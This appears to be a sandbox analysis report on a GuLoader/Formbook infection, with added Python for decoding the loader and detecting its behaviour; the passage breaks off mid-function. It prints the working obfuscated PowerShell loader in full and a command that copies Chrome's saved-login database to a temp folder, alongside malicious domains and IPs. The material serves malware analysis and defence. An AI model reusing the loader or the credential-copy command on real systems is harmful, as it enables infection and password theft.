Gem:Funk:UnbeAKataSAminC,urtIdiabIu fo.frilGTidseRaftt S,eS ultQuarrRegaiTricnsiphg.lka( Bug$ SmaUBo,tnCondwSnici esosDaglhGoldfAppruT.aflInbo2 ag3Poly3Hero)Brea ');Eddied (Bleens ' dde$ alg o.glTrynoPentbPrveaSvinl,dst:TidsaKettlSvinbYmteiAfmrnAlfeiLiths Su.mbec.=T.yl$ KarDMurayGen.b dvie C olovers,ore. KnosAntruDuodbGenlsNon t eslr AssiScannBombgTur,( Wei$ KloGSkytrSkria tenf ciriKr lkNeweiG.ninCa.adMogohH poo katlTramdbrai, Je.$Zymod RudeOmsvmmarko abd S.tuPenglEnviap lotDragoGus r FabeTheer IndsBomb)Rini ');Eddied $albinism;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aerosoldaasen.Com && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "write 'Mandlige Kannibalismes Scalers Multimate38 Theologised77 Abrico Fibber Mjsom Forhandlersalg Sindssvages Xx Dybels Tarmkanalers Tel Backhaul Malacanthine Reaktionsevnes Pastoralerne handlelammet Chemotherapeuticness104 Fabrikatets Garewaite Atimy Problemomraaderne Mandlige Kannibalismes Scalers Multimate38 Theologised77 Abrico Fibber Mjsom Forhandlersalg Sindssvages Xx Dybels Tarmkanalers Tel Backhaul Malacanthine Reaktionsevnes Pastoralerne handlelammet Chemotherapeuticness104 Fabrikatets Garewaite Atimy Problemomraaderne';If (${host}.CurrentCulture) {$Truncus++;}$Euforisering='SUBsTR';$Euforisering+='ing';Function Bleens($Nedrakkes){$timetalsreduktionens=$Nedrakkes.Length-$Truncus;For( $Ryotwary=4;$Ryotwary -lt $timetalsreduktionens;$Ryotwary+=5){$Mandlige+=$Nedrakkes.$Euforisering.Invoke( $Ryotwary, $Truncus);}$Mandlige;}function Eddied($Handrail){ . ($Gidseltageres) ($Handrail);}$Personifikationers137=Bleens ' MetM DokoImmazFagmi,ryslIntrl Af.aBe,y/Brud5 Rec. eac0Vild ,up(ArusWReceiUs ln ispdStamoNodewF resCogn ,raaNPassT,pgj Stfo1Crib0 St,.Soap0Zi.c;Sind LesiWame.iSludn Nar6Resq4 tla;Refu SystxRavn6Spar4.rug;Skv. AarsrAl.avTil :Indv1Cero2Hold1Lemm.B.ar0Prog) .or TypGMa me G.mcWamakTilhoAnt./For,2Toet0 Fo.1.oin0Tr,d0Udle1Pred0Spyg1Micr UngeF D miHalvr JogeMandfSkolo Kilxfors/ ecu1E.tr2 In 1 rl.Re t0Tamt ';$Affaldsbrser171=Bleens 'RappUknigsGrimeBo drSkri-DdsbAUdvegD,apeBrodnMasttdi.u ';$Theologised77=Bleens 'Bog.h AentFiddtAtalp .nds Mon:Eman/Stng/Ussee H.mcswaroEndenBracsSladt Di,rSoutaLittm None CatdFatuioo.iaSu s.Fod,cGeneoklismor.h/MisdBUrovrKrisn Bude UdvbMancyRokkg Freg ,elesig.rSteriUn.e.D bbmVanvsUnbooSvig ';$Willowiness=Bleens 'Stet> ka ';$Gidseltageres=Bleens 'Eosii fodeResuxTew. ';$Fissens='Mjsom';$Strombus = Bleens ' PhieGlosc SkrhGe uo Af. 
Seks%G,una synpaffapS,led,ispa Gr tThecaDo t%Clod\SkruABenteMogur SkuoErhvsLiffotrailBesndLoneaAflaaKreds.upeeUndsn Non.AntiC CheoFeasmDest ,oot&Gr,g&Buni OutmeIn rcR,dehStnnoStaa DigetRt b ';Eddied (Bleens ' nc$ ling Ac,lTilbo Coeb undaBiv.l.sta: Un,CU,deoMiset BonaPo inA,ho=Kaza(AvescAerom.rridI.dt Indl/MagecJaco skep$La eS SubtThiur.maaoKr.kmLocobL.ukuUdsksbeto)Angl ');Eddied (Bleens 'Metr$.lfag Syml VedoUnd bCiana ScolVic.:MeshMsal uFaullT qut Quai Elym Wakaforbt ,abe S.i3Broi8.mso=Flet$ PetT Burh shae.yndoTam,l,rivoDev,g,roqiSsl sVoc e CondS ak7Prod7Oms,.Ceras M sp ,eclGloriA,metMel (Balm$SaimWAppliFjerl kralLateoSplewNortiSebanCoffeAmtssG.uns For) Men ');Eddied (Bleens 'Hemi[TornNParaeR iltN,ve.M.gnSTi,eeraffrTricvMu,ri ExocTatoe.issPBisto KoniArkinredet ,alMCapiaS.ymn b sa,illgVatne Knir Tsu]Bacc:Varv: LumSQ.areJordc S,puReshrU ntiSyn,tIne yLumbPK.agrB.gyoT.ixtOveroUnmucEngioFloelMad No,d= Sca cha [WhipNIm.ee atat Men.FusiSUmque.itacLatruAntir Inci By.tA.foy toaPEpi rSoveoBesmtTot o Autc OmboBarolIn,mT Pr yStr.pR seeFoug]F,rt:,ilo:SlgtTUndelBanas an1Blet2Zeuc ');$Theologised77=$Multimate38[0];$Nonmultiple= (Bleens 'dr.a$ negKatel,fflo NumbBjrnaEnchlMisk:DeteUSax hBaf yE,sfrgil lCambi P eg poreF li=AspiN Elaecamiw ys-o,taOUnfrb,ubij.ermeFunkcPiketTurd Ov rSChriyHumpsSnapt FaceNonvm Kul.FyriN ,ndeRekltJoe,. HolWClameBldtbDe eCMarslS ioiDisce ,vinPoget');$Nonmultiple+=$Cotan[1];Eddied ($Nonmultiple);Eddied (Bleens 'Vide$VideURenuh PrayS.itr semlUn,oi ud.g ared,oe. eksH OrleImplaVentd nineFaldrProds C.e[kaut$CrysAHenhfUntifFlora MurlPlend .hisQuo.bRemorSsygsRea.eDe irShi 1Ton.7Sup,1Glau]Soci=Fro,$VictPflj,eInd,r Ti s D poSprinUnc,ia,raf.ouriThank,okaaWintt HepiUnt.oTordnSt.aeDr grDatas Cul1 Sko3Cong7Prte ');$Unto=Bleens ' awk$UdpeUSugnhAccey Ba,rVa.olPyraiRidagForbeEn.e. 
Mi DSkruoRemaw FernVenalArreo HelaTilbd .ntF ConiAalelMataeTre.(Skot$Sl,mTrrinhSacreMegaoFredlGaaeoBiltg,ordi ertsAegtePa edImpa7 Sol7M.cr,H,rd$Sy.kGK.isa ,ndrP.eae,uglwFosfa holiIsogtSuleeHusu)F.rs ';$Garewaite=$Cotan[0];Eddied (Bleens 'Zoha$Ha,cgIndilMirio lkkbSil.aB jdl arr:CeteWL.pao BiloFolkd St.hFngseS.nswCha,eSp.irArie=Ford(FastTTelee FlasSkamtSyds-CurePSkibaSelvtY erhBrnd Pre,$AdlyGFirsagr.drPinkeTumlwProdaanteiSchitDeadeAar.)gett ');while (!$Woodhewer) {Eddied (Bleens 'Vamo$ForegServllivsoSmilbH,emaRenslLute:PurlGSkr,otensn igaesoppSpktoSohodD tr=Umbr$Mil,tBorerUn.lu refe Mac ') ;Eddied $Unto;Eddied (Bleens 'EfteS EndtUnbia orerGl,stMynd-UninSSmatlCrose Cale.aukpBesk Para4H,da ');Eddied (Bleens 'Di,e$Forkg NullA,tooK,nsbHoveaM,rdlIndd: mpWOutfoBesmoUnc,d .urh FuneD,arwropee,oleroct,=outb( DetTUniceRuins LovtAfsk-undkPRebeaB.sotPhonhUdra To,$ TabGNiv.aOlymrPrimeElsewPresaOrgaiBlovtWogheMa t)indk ') ;Eddied (Bleens 'Al.e$ Regg SkolUniooForgbRingaflukl M s: KakSGloscB odaRev.lDistePreer P.osSk,v=Iacc$ UvigTu.ilJerkoGulnbra taFej l Sti:CresKG,gsa A.bnBr,dnPo.ei GrnbProba nmlMissiIntesTrummE.eneCigascapi+Mynp+bolt%Endr$GabeMAtteu Si l s,stAndeiFab mnd naAtritBagge Kap3 Kom8Tapp. 
PrecGni oM tiuSkygnPopltinte ') ;$Theologised77=$Multimate38[$Scalers];}$Grafikindhold=298359;$demodulatorers=27193;Eddied (Bleens ' Skr$K ligken.lOogoo DypbR.vaaRevolDia :,onbFAilmoVerdr.owehFje.a AfbnBewidPredlHoroe GarrRemisDeteaTryplPre,g.nde Aage=Lykk IndlG F seU ertDo t-PlayCpolioFjednPaxitO,hoeForfntractAfd In.t$Pe cG.aviaEj.tr F reA ndwUvilaZymoiMartt UnieMale ');Eddied (Bleens 'Beau$conggAngil DaloV.jbbBalnaredil Cit:InteUKonfnPrecw uneiLithsKreshInv fVedhu gral am2Term3Hjem3Nonf Vaad=Snke Kok[ViiiSEndoyBrodsMyrrt itheM nom liz.JenfC N.do .rtn PalvStemeUmorrCelet Kr ]Alle:nest: ValFPlutrsk,ioK.udmbrubBGrana .ins B,geShor6r ar4F,rsSFuldtKan.r CabiJagenO.tagUnme(Py,a$ alF Tr.oHidfr SirhNoira Pr n,ackdBetylSupee AfvrAktisEntra,hadlLandg Ban)hftb ');Eddied (Bleens ' con$ nhegP lilBarwoAp,ebEm,saSnowl Par: ParDM inyClarbkiloe Cryl hipsAden Gri,=Ugem ill[TuliSEnvey CrasbogwtSc.tedambm ,mu.ProsT TareEscaxAntitB,ho. ShiE ,qunSel cLskuoDeted,apyiLgeknPresgSu.a] Gem:Funk:UnbeAKataSAminC,urtIdiabIu fo.frilGTidseRaftt S,eS ultQuarrRegaiTricnsiphg.lka( Bug$ SmaUBo,tnCondwSnici esosDaglhGoldfAppruT.aflInbo2 ag3Poly3Hero)Brea ');Eddied (Bleens ' dde$ alg o.glTrynoPentbPrveaSvinl,dst:TidsaKettlSvinbYmteiAfmrnAlfeiLiths Su.mbec.=T.yl$ KarDMurayGen.b dvie C olovers,ore. KnosAntruDuodbGenlsNon t eslr AssiScannBombgTur,( Wei$ KloGSkytrSkria tenf ciriKr lkNeweiG.ninCa.adMogohH poo katlTramdbrai, Je.$Zymod RudeOmsvmmarko abd S.tuPenglEnviap lotDragoGus r FabeTheer IndsBomb)Rini ');Eddied $albinism;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aerosoldaasen.Com && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
C:\Windows\SysWOW64\autochk.exe
"C:\Windows\SysWOW64\autochk.exe"
C:\Windows\SysWOW64\svchost.exe
"C:\Windows\SysWOW64\svchost.exe"
C:\Windows\SysWOW64\cmd.exe
/c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V
C:\Program Files\Mozilla Firefox\Firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
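The PowerShell command line above is a GuLoader stage in which every fifth character of each quoted string is payload and the other four are filler drawn from Danish-looking words: reading the fragment `IndlG F seU ertDo t-PlayCpolioFjednPaxitO,hoeForfntract` at stride 5, offset 4 gives `Get-Content`, and the four `Eddied (Bleens '...')` calls decode, allowing for whitespace that page extraction has collapsed, to roughly `$global:... = Get-Content <file>`, `... = [System.Convert]::FromBase64String(...)`, `... = [System.Text.Encoding]::ASCII.GetString(...)` and `... .substring($Grafikindhold,$demodulatorers)`, with `$Grafikindhold=298359` and `$demodulatorers=27193` taken from the line, after which `Eddied $albinism` runs the carved text. Because the filler contains spaces, any run of collapsed whitespace shifts the alignment, so the decoder is best applied to fragments whose alignment can be checked against a known token. The Python below is an added example, not part of the report or the sandbox's tooling: the stride decoder, a brute-force guess of stride and offset scored on PowerShell tokens, and the base64-then-substring carve run over a constructed blob. The report does not state which file `Get-Content` reads; `%appdata%\Aerosoldaasen.Com` from the process list is the likely candidate, but that is an assumption.

```python
import base64

# Fragment copied from the obfuscated PowerShell command line in this report
# (part of one Bleens '...' argument).  Every fifth character is payload.
FRAGMENT = "IndlG F seU ertDo t-PlayCpolioFjednPaxitO,hoeForfntract"

# Offset and length from the same command line ($Grafikindhold, $demodulatorers).
STAGE_OFFSET = 298359
STAGE_LENGTH = 27193

# Tokens a stage like this needs; a candidate decoding that contains one of
# them almost certainly has the right stride and offset.
TOKENS = ("Get-Content", "FromBase64String", "GetString", "substring", "$global:")


def decode_stride(s: str, stride: int, offset: int) -> str:
    """Keep one character out of every `stride`, starting at `offset`."""
    return s[offset::stride]


def guess_stride(s: str, max_stride: int = 8):
    """Brute-force (stride, offset) and return the best candidate with its text.

    A token hit dominates the score; without one the fallback (fraction of
    characters that look like PowerShell) is only a weak hint.
    """
    best = (-1.0, 0, 0, "")
    for stride in range(2, max_stride + 1):
        for offset in range(stride):
            cand = decode_stride(s, stride, offset)
            score = 100.0 * sum(cand.count(t) for t in TOKENS)
            score += sum(c.isalnum() or c in "$:[]().-=, " for c in cand) / max(len(cand), 1)
            if score > best[0]:
                best = (score, stride, offset, cand)
    return best[1], best[2], best[3]


def carve_stage(blob_b64: str, offset: int, length: int) -> str:
    """Mirror of the decoded stage: FromBase64String -> ASCII -> substring."""
    text = base64.b64decode(blob_b64).decode("ascii", errors="replace")
    return text[offset:offset + length]


# Constructed stand-in for the dropped file (not the real sample): filler, a
# 12-byte "stage", more filler, base64-encoded as the decoded stage expects.
CONSTRUCTED_INNER = "JUNKJUNKJUNK" + "Invoke-Thing" + "MOREJUNKHERE"
CONSTRUCTED_BLOB = base64.b64encode(CONSTRUCTED_INNER.encode("ascii")).decode("ascii")


if __name__ == "__main__":
    stride, offset, text = guess_stride(FRAGMENT)
    print(f"stride={stride} offset={offset} -> {text!r}")
    print(carve_stage(CONSTRUCTED_BLOB, 12, 12))
    # On the real dropped file: carve_stage(blob, STAGE_OFFSET, STAGE_LENGTH)
```

The offset and length imply the dropped file decodes to at least 325552 bytes of text, of which only the 27193-byte window at 298359 is executed; the rest is padding that keeps static scanners busy.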
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | econstramedia.com | udp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.216.211.103.in-addr.arpa | udp |
| IN | 103.211.216.55:443 | econstramedia.com | tcp |
| US | 8.8.8.8:53 | 168.245.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.x6hk8.com | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.cindcxyshirts.shop | udp |
| US | 104.21.93.64:80 | www.cindcxyshirts.shop | tcp |
| US | 8.8.8.8:53 | 64.93.21.104.in-addr.arpa | udp |
| US | 104.21.93.64:80 | www.cindcxyshirts.shop | tcp |
| US | 104.21.93.64:80 | www.cindcxyshirts.shop | tcp |
| US | 8.8.8.8:53 | www.limbicmindset.com | udp |
| US | 3.33.130.190:80 | www.limbicmindset.com | tcp |
| US | 8.8.8.8:53 | 190.130.33.3.in-addr.arpa | udp |
| US | 3.33.130.190:80 | www.limbicmindset.com | tcp |
| US | 3.33.130.190:80 | www.limbicmindset.com | tcp |
| US | 8.8.8.8:53 | www.vnddq.biz | udp |
| HK | 20.2.168.177:80 | www.vnddq.biz | tcp |
| US | 8.8.8.8:53 | 177.168.2.20.in-addr.arpa | udp |
| HK | 20.2.168.177:80 | www.vnddq.biz | tcp |
| HK | 20.2.168.177:80 | www.vnddq.biz | tcp |
| US | 8.8.8.8:53 | www.clearconceptslearning.com | udp |
| US | 34.149.87.45:80 | www.clearconceptslearning.com | tcp |
| US | 8.8.8.8:53 | 45.87.149.34.in-addr.arpa | udp |
| US | 34.149.87.45:80 | www.clearconceptslearning.com | tcp |
| US | 34.149.87.45:80 | www.clearconceptslearning.com | tcp |
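One pattern in the Network table is worth pulling out mechanically: a single forward DNS query followed by a fixed number of TCP connections per host, first econstramedia.com on 443 and then a series of unrelated-looking domains on port 80, interleaved with reverse (in-addr.arpa) lookups of the addresses just contacted. Formbook walks a configured list of domains of which usually only one is live, so a per-domain summary is a triage list, not a confirmed C2 list. The Python below is an added example (not the sandbox's own tooling) that parses a subset of the rows above, copied inline, folds PTR queries back into the IPs they name, and reports per-domain endpoints and connection counts together with any reverse-resolved address that never appears as a TCP destination.

```python
from collections import defaultdict

# Subset of rows copied from the Network table above: Country | Destination | Domain | Proto
ROWS = """\
US | 8.8.8.8:53 | econstramedia.com | udp
IN | 103.211.216.55:443 | econstramedia.com | tcp
US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 55.216.211.103.in-addr.arpa | udp
IN | 103.211.216.55:443 | econstramedia.com | tcp
US | 8.8.8.8:53 | www.cindcxyshirts.shop | udp
US | 104.21.93.64:80 | www.cindcxyshirts.shop | tcp
US | 8.8.8.8:53 | 64.93.21.104.in-addr.arpa | udp
US | 104.21.93.64:80 | www.cindcxyshirts.shop | tcp
US | 104.21.93.64:80 | www.cindcxyshirts.shop | tcp
US | 8.8.8.8:53 | www.vnddq.biz | udp
HK | 20.2.168.177:80 | www.vnddq.biz | tcp
US | 8.8.8.8:53 | 177.168.2.20.in-addr.arpa | udp
HK | 20.2.168.177:80 | www.vnddq.biz | tcp
HK | 20.2.168.177:80 | www.vnddq.biz | tcp
"""

PTR_SUFFIX = ".in-addr.arpa"


def parse_rows(text: str):
    """Split the pipe-separated rows into dicts with ip/port/domain/proto."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        country, dest, domain, proto = (p.strip() for p in line.split("|"))
        ip, port = dest.rsplit(":", 1)
        rows.append({"country": country, "ip": ip, "port": int(port),
                     "domain": domain, "proto": proto})
    return rows


def ptr_to_ip(name: str):
    """'55.216.211.103.in-addr.arpa' -> '103.211.216.55'; None for non-PTR names."""
    if not name.endswith(PTR_SUFFIX):
        return None
    return ".".join(reversed(name[:-len(PTR_SUFFIX)].split(".")))


def summarize(rows):
    """Per domain: forward DNS queries, TCP connection count and endpoints hit."""
    out = defaultdict(lambda: {"dns": 0, "tcp": 0, "endpoints": set()})
    for r in rows:
        if r["proto"] == "udp" and r["port"] == 53:
            if ptr_to_ip(r["domain"]) is None:   # reverse lookups are handled separately
                out[r["domain"]]["dns"] += 1
        elif r["proto"] == "tcp":
            out[r["domain"]]["tcp"] += 1
            out[r["domain"]]["endpoints"].add(f'{r["ip"]}:{r["port"]}')
    return dict(out)


def unmatched_ptr_ips(rows):
    """IPs that were reverse-resolved but never appear as a TCP destination."""
    tcp_ips = {r["ip"] for r in rows if r["proto"] == "tcp"}
    ptr_ips = {ip for r in rows if (ip := ptr_to_ip(r["domain"])) is not None}
    return sorted(ptr_ips - tcp_ips)


def repeated_http_hosts(summary, min_conns: int = 3):
    """Domains hit on port 80 at least `min_conns` times: the set to triage for the live C2."""
    return sorted(d for d, s in summary.items()
                  if s["tcp"] >= min_conns and all(e.endswith(":80") for e in s["endpoints"]))


if __name__ == "__main__":
    rows = parse_rows(ROWS)
    summary = summarize(rows)
    for domain, s in summary.items():
        print(f'{domain:28} dns={s["dns"]} tcp={s["tcp"]} {sorted(s["endpoints"])}')
    print("PTR-only IPs:", unmatched_ptr_ips(rows))
    print("repeated HTTP hosts:", repeated_http_hosts(summary))
```

On the subset embedded above the only reverse lookup without a matching TCP row is 40.126.32.76, which is sandbox or platform background traffic rather than sample activity; on the full table the same check separates the sample's connections from that noise.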
Files
memory/448-2-0x00007FFAA7FA3000-0x00007FFAA7FA5000-memory.dmp
memory/448-3-0x000001D8C0E00000-0x000001D8C0E22000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qknwf5f4.wlw.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/448-13-0x00007FFAA7FA0000-0x00007FFAA8A61000-memory.dmp
memory/448-14-0x00007FFAA7FA0000-0x00007FFAA8A61000-memory.dmp
memory/1984-17-0x000000007522E000-0x000000007522F000-memory.dmp
memory/1984-18-0x00000000024F0000-0x0000000002526000-memory.dmp
memory/1984-19-0x0000000075220000-0x00000000759D0000-memory.dmp
memory/1984-20-0x0000000005140000-0x0000000005768000-memory.dmp
memory/1984-21-0x0000000075220000-0x00000000759D0000-memory.dmp
memory/1984-22-0x0000000004F60000-0x0000000004F82000-memory.dmp
memory/1984-23-0x0000000005000000-0x0000000005066000-memory.dmp
memory/1984-24-0x0000000005070000-0x00000000050D6000-memory.dmp
memory/1984-34-0x00000000057F0000-0x0000000005B44000-memory.dmp
memory/1984-35-0x0000000005EB0000-0x0000000005ECE000-memory.dmp
memory/1984-36-0x0000000005F40000-0x0000000005F8C000-memory.dmp
memory/1984-37-0x00000000077F0000-0x0000000007E6A000-memory.dmp
memory/1984-38-0x00000000063C0000-0x00000000063DA000-memory.dmp
memory/1984-39-0x0000000007210000-0x00000000072A6000-memory.dmp
memory/1984-40-0x0000000007100000-0x0000000007122000-memory.dmp
memory/1984-41-0x0000000008420000-0x00000000089C4000-memory.dmp
C:\Users\Admin\AppData\Roaming\Aerosoldaasen.Com
| MD5 | 0297ce57c232a13444390269f1a9ea8c |
| SHA1 | 718c8339e362670e5ba20bec7f3f81d7ef4caed9 |
| SHA256 | f67a6e89cac1951035fe6d5a477641bb80bf1f3b4c88f4b125e4bf7a15fea679 |
| SHA512 | 6e3d4a24d3591973609296b6a0a2cc563556e225b0fda191a556e3e95ff40305f8692c563e10bce3853f99445f26073364338354c582c3688f6d4fa28aa99527 |
memory/1984-43-0x00000000089D0000-0x000000000A4D0000-memory.dmp
memory/448-44-0x00007FFAA7FA0000-0x00007FFAA8A61000-memory.dmp
memory/448-45-0x00007FFAA7FA3000-0x00007FFAA7FA5000-memory.dmp
memory/1984-53-0x0000000075220000-0x00000000759D0000-memory.dmp
memory/2240-52-0x0000000001200000-0x0000000002D00000-memory.dmp
memory/448-56-0x00007FFAA7FA0000-0x00007FFAA8A61000-memory.dmp
memory/3244-57-0x00000000004A0000-0x00000000004AE000-memory.dmp
memory/3244-60-0x00000000004A0000-0x00000000004AE000-memory.dmp
memory/2240-58-0x0000000001200000-0x0000000002D00000-memory.dmp
memory/3244-61-0x0000000000170000-0x000000000019F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\DB1
| MD5 | a182561a527f929489bf4b8f74f65cd7 |
| SHA1 | 8cd6866594759711ea1836e86a5b7ca64ee8911f |
| SHA256 | 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914 |
| SHA512 | 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558 |
memory/3428-77-0x0000000008AE0000-0x0000000008C43000-memory.dmp
C:\Users\Admin\AppData\Roaming\J104S8QS\J10logri.ini
| MD5 | d63a82e5d81e02e399090af26db0b9cb |
| SHA1 | 91d0014c8f54743bba141fd60c9d963f869d76c9 |
| SHA256 | eaece2eba6310253249603033c744dd5914089b0bb26bde6685ec9813611baae |
| SHA512 | 38afb05016d8f3c69d246321573997aaac8a51c34e61749a02bf5e8b2b56b94d9544d65801511044e1495906a86dc2100f2e20ff4fcbed09e01904cc780fdbad |
C:\Users\Admin\AppData\Roaming\J104S8QS\J10logrf.ini
| MD5 | 2f245469795b865bdd1b956c23d7893d |
| SHA1 | 6ad80b974d3808f5a20ea1e766c7d2f88b9e5895 |
| SHA256 | 1662d01a2d47b875a34fc7a8cd92e78cb2ba7f34023c7fd2639cbb10b8d94361 |
| SHA512 | 909f189846a5d2db208a5eb2e7cb3042c0f164caf437e2b1b6de608c0a70e4f3510b81b85753dbeec1e211e6a83e6ea8c96aff896e9b6e8ed42014473a54dc4f |
C:\Users\Admin\AppData\Roaming\J104S8QS\J10logrg.ini
| MD5 | 4aadf49fed30e4c9b3fe4a3dd6445ebe |
| SHA1 | 1e332822167c6f351b99615eada2c30a538ff037 |
| SHA256 | 75034beb7bded9aeab5748f4592b9e1419256caec474065d43e531ec5cc21c56 |
| SHA512 | eb5b3908d5e7b43ba02165e092f05578f45f15a148b4c3769036aa542c23a0f7cd2bc2770cf4119a7e437de3f681d9e398511f69f66824c516d9b451bb95f945 |
C:\Users\Admin\AppData\Roaming\J104S8QS\J10logrv.ini
| MD5 | bbc41c78bae6c71e63cb544a6a284d94 |
| SHA1 | 33f2c1d9fa0e9c99b80bc2500621e95af38b1f9a |
| SHA256 | ee83c6bcea9353c74bfc0a7e739f3c4a765ace894470e09cdcdebba700b8d4cb |
| SHA512 | 0aea424b57adae3e14ad6491cab585f554b4dffe601b5a17bad6ee6177d2f0f995e419cde576e2d1782b9bddc0661aada11a2c9f1454ae625d9e3223635ec9f4 |
C:\Users\Admin\AppData\Roaming\J104S8QS\J10logim.jpeg
| MD5 | 5293effc66c000f03ef08f79303f02f3 |
| SHA1 | 71ab910b8d8e88db066adf2ed7d66cc01c33d1fa |
| SHA256 | 1f65c99a30a05ab9c513790e59eaba8c00643629692dd794f74b9f0e2373efe7 |
| SHA512 | ff792e81e4fbe29fac826fe92d2ccd15480f43ecb3919d7bb7a33ab155aab75d0e0bcfb72d46ad3fde9d89363d93480a036189e67b45d61585a6de4b0d78915e |
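Three things in this report are cheap to detect on an endpoint: cmd.exe launched only to expand `%appdata%` into a drop path (`echo %appdata%\Aerosoldaasen.Com && echo t`), the cmd.exe copy of Chrome's Login Data into %LOCALAPPDATA%\Temp, and the cluster of `<prefix>log{ri,rf,rg,rv}.ini` plus `<prefix>logim.jpeg` files written under a random eight-character %APPDATA% directory. The Python below is an added example, not part of the report: a small rule set run over a constructed event stream whose command lines and paths are copied from this page (the event shape and the PIDs are made up). The credential-store list is widened to the Chrome and Firefox files (Web Data, Cookies, logins.json, key4.db, cert9.db) the same copy-to-temp technique targets, and the log-file rule generalizes the `J104S8QS\J10log*.ini` names observed here.

```python
import re
from collections import defaultdict

# Constructed event stream.  Command lines and paths are copied from this
# report; the event shape and the PIDs are made up for the example.
EVENTS = [
    {"type": "process", "pid": 1, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aerosoldaasen.Com && echo t"'},
    {"type": "process", "pid": 2, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'/c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" '
                r'"C:\Users\Admin\AppData\Local\Temp\DB1" /V'},
    {"type": "file", "pid": 3, "path": r"C:\Users\Admin\AppData\Roaming\J104S8QS\J10logri.ini"},
    {"type": "file", "pid": 3, "path": r"C:\Users\Admin\AppData\Roaming\J104S8QS\J10logrf.ini"},
    {"type": "file", "pid": 3, "path": r"C:\Users\Admin\AppData\Roaming\J104S8QS\J10logrg.ini"},
    {"type": "file", "pid": 3, "path": r"C:\Users\Admin\AppData\Roaming\J104S8QS\J10logrv.ini"},
    {"type": "file", "pid": 3, "path": r"C:\Users\Admin\AppData\Roaming\J104S8QS\J10logim.jpeg"},
    {"type": "file", "pid": 4, "path": r"C:\Users\Admin\AppData\Roaming\Aerosoldaasen.Com"},
]

# Browser credential stores: Chrome's Login Data (seen here) plus the other
# Chrome and Firefox files the same copy-to-temp technique goes after.
CRED_STORES = ("login data", "web data", "cookies", "logins.json", "key4.db", "cert9.db")
COPY_RE = re.compile(r"\bcopy\b", re.I)
TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.I)
# cmd.exe used only to expand %appdata% into a drop path
ECHO_APPDATA_RE = re.compile(r"\becho\s+%appdata%\\", re.I)
# Roaming\<8 alnum>\<3 alnum>log{ri,rf,rg,rv}.ini or ...logim.jpeg
LOG_DROP_RE = re.compile(
    r"\\AppData\\Roaming\\([A-Z0-9]{8})\\[A-Z0-9]{3}log(r[ifgv]\.ini|im\.jpeg)$", re.I)


def detect(events):
    """Return (rule, pid) findings; the log-drop rule fires once a process has
    written at least three of the named files into the same directory."""
    findings = []
    drops = defaultdict(set)
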